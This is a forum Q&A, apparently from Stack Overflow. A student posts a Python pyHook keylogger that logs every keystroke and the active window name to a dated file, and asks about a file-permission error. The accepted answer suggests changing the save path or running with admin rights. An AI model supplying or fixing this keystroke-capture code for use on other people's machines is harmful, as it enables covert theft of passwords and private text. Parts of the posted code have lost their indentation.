# Keylogger errors

Tags: python, keylogger

im new to this site, this year we started learning python in school but we do the basic things and i was a bit bored so i was searching for interesting scripts untill i found how to make keylogger. I got some code but its not working. i fixed some of the errors but still

(NOTE1: i wont be using this anywhere else except my old pc so yeah, not trying to be a hacker or w/e)

(NOTE2: sorry for my bad english, im Greek :P)

```
import pyHook, pythoncom
from datetime import datetime

todays_date = datetime.now().strftime('%Y-%b-%d')
file_name = 'C:\\Documents'+todays_date+'.txt'

line_buffer = "" #current typed line before return character
window_name = "" #current window

def SaveLineToFile(line):
current_time = datetime.now().strftime('%H:%M:%S')
line = "[" + current_time + "] " + line
todays_file = open(file_name, 'a') #open todays file (append mode)
todays_file.write(line) #append line to file
todays_file.close() #close todays file

def OnKeyboardEvent(event):
global line_buffer
global window_name

#print 'Ascii:', event.Ascii, chr(event.Ascii) #pressed value

"""if typing in new window"""
if(window_name != event.WindowName): #if typing in new window
    if(line_buffer != ""): #if line buffer is not empty
        line_buffer += '\n'
        SaveLineToFile(line_buffer) #print to file: any non printed                   characters from old window

    line_buffer = "" #clear the line buffer
    SaveLineToFile('\n-----WindowName: ' + event.WindowName + '\n') #print       to file: the new window name
    window_name = event.WindowName #set the new window name

"""if return or tab key pressed"""
if(event.Ascii == 13 or event.Ascii == 9): #return key
    line_buffer += '\n'
    SaveLineToFile(line_buffer) #print to file: the line buffer
    line_buffer = "" #clear the line buffer
    return True #exit event

"""if backspace key pressed"""
if(event.Ascii == 8): #backspace key
    line_buffer = line_buffer[:-1] #remove last character
    return True #exit event

"""if non-normal ascii character"""
if(event.Ascii < 32 or event.Ascii > 126):
    if(event.Ascii == 0): #unknown character (eg arrow key, shift, ctrl, alt)
        pass #do nothing
    else:
        line_buffer = line_buffer + '\n' + str(event.Ascii) + '\n'
else:
    line_buffer += chr(event.Ascii) #add pressed character to line buffer

return True #pass event to other handlers

hooks_manager = pyHook.HookManager() #create hook manager
hooks_manager.KeyDown = OnKeyboardEvent #watch for key press
hooks_manager.HookKeyboard() #set the hook
pythoncom.PumpMessages() #wait for events﻿
```

The errors are:

```
Traceback (most recent call last):
File "C:\Python27\lib\site-packages\pyHook\HookManager.py", line 351, in        KeyboardSwitch
return func(event)
File "C:\Python27\test123.py", line 30, in OnKeyboardEvent
SaveLineToFile('\n-----WindowName: ' + event.WindowName + '\n') #print to    file: the new window name
File "C:\Python27\test123.py", line 13, in SaveLineToFile
todays_file = open(file_name, 'a') #open todays file (append mode)
IOError: [Errno 13] Permission denied: 'C:\\Documents2017-Mar-31.txt'
```

Answer (score 1, accepted):

As the error message already says, there is no problem with the code itself, but python have to have access to the folder you want to save your documents in. Try using a different folder or giving Python administrator rights when you run this program. For me `file_name = 'C:\\Users\\{MyName}\\Documents\\'+todays_date+'.txt'` worked perfectly fine.